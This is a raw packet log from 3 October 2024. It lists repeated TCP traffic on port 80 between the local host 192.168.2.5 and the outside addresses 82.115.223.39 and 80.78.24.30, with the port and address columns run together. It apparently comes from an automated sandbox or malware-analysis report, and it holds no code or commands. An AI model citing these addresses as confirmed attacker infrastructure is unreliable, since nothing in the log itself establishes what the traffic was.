                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.668190956 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.668232918 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670008898 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670027971 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670046091 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670063019 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670090914 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670092106 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670115948 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670133114 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670171976 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670237064 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670253038 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670283079 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670306921 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670607090 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670619965 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670653105 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713640928 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713661909 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713680983 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713747025 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713779926 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755280018 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755351067 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755414963 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755440950 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755470037 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755500078 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755503893 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755538940 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755561113 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755572081 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755605936 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755628109 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755649090 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755656004 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755691051 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755726099 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755754948 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755759954 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755772114 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755794048 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755825996 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755851030 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755860090 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755872011 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755909920 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756009102 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756042004 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756067991 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756077051 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756088972 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756110907 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756120920 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756145000 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756154060 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756186962 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756294966 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756324053 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756350994 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756359100 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756369114 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756392956 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756405115 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756426096 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756438017 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756459951 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756467104 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756509066 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756596088 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756628036 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756654024 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756661892 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756669998 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756690979 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756716013 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756731033 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756804943 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756836891 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756870031 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756902933 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756913900 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757066011 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757097960 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757114887 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757131100 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757142067 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757164955 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757199049 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757211924 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757234097 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757266998 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757277966 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757302999 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757491112 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757519960 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757550955 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757567883 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757585049 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757595062 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757617950 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757647038 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757647038 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757652044 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757668972 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757687092 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.757694006 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758022070 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758054018 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758080959 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758089066 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758096933 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758121967 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758155107 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758166075 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758188009 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758220911 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758233070 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758265018 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758300066 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758332014 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758371115 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.758379936 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.761956930 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.761990070 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762018919 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762022018 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762058020 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762058973 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762092113 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762105942 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762129068 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762173891 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762197018 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762245893 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762279034 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762305021 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762311935 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762321949 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762346029 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762381077 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762394905 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762487888 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762520075 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762546062 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762552977 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762563944 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.762948990 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804369926 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804418087 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804454088 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804487944 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804492950 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804524899 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804555893 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804558992 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804558992 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804589033 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.804609060 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846126080 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846149921 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846167088 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846182108 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846184969 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846198082 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846218109 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846223116 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846239090 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846246004 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846255064 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846261024 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846271992 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846287012 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846290112 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846302986 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846313000 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846321106 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846340895 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846368074 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846489906 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846530914 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846595049 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846628904 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846662045 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846673965 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846695900 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846700907 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846730947 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846776962 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846932888 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846966982 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846999884 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847014904 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847033978 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847044945 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847067118 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847100973 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847112894 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847136021 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847177029 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847198009 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847253084 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.293905020 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.298861027 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.299047947 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.299370050 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.304151058 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.927695990 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.927773952 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928045988 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928097010 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928147078 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928606987 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.932975054 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.933590889 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.933656931 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.939049959 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.944000006 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635402918 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635476112 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635782003 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635832071 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635845900 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.636277914 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.640649080 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.641078949 CEST80414990980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.641163111 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.641239882 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.644335032 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.646313906 CEST80414990980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.646373987 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.649095058 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.649163961 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.649868965 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.654616117 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.334979057 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.335202932 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.335293055 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.342178106 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.342818975 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.349778891 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.350450993 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.350516081 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.359551907 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.368989944 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.972744942 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.972894907 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.973146915 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.973495960 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.973932981 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.978468895 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.978796959 CEST80414991880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.981713057 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.981827021 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.986831903 CEST80414991880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.986896992 CEST80414991880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.986968040 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.075532913 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.080878019 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.080935955 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.093470097 CEST499388041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.098422050 CEST80414993882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.098536015 CEST499388041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.099009037 CEST499388041192.168.2.582.115.223.39
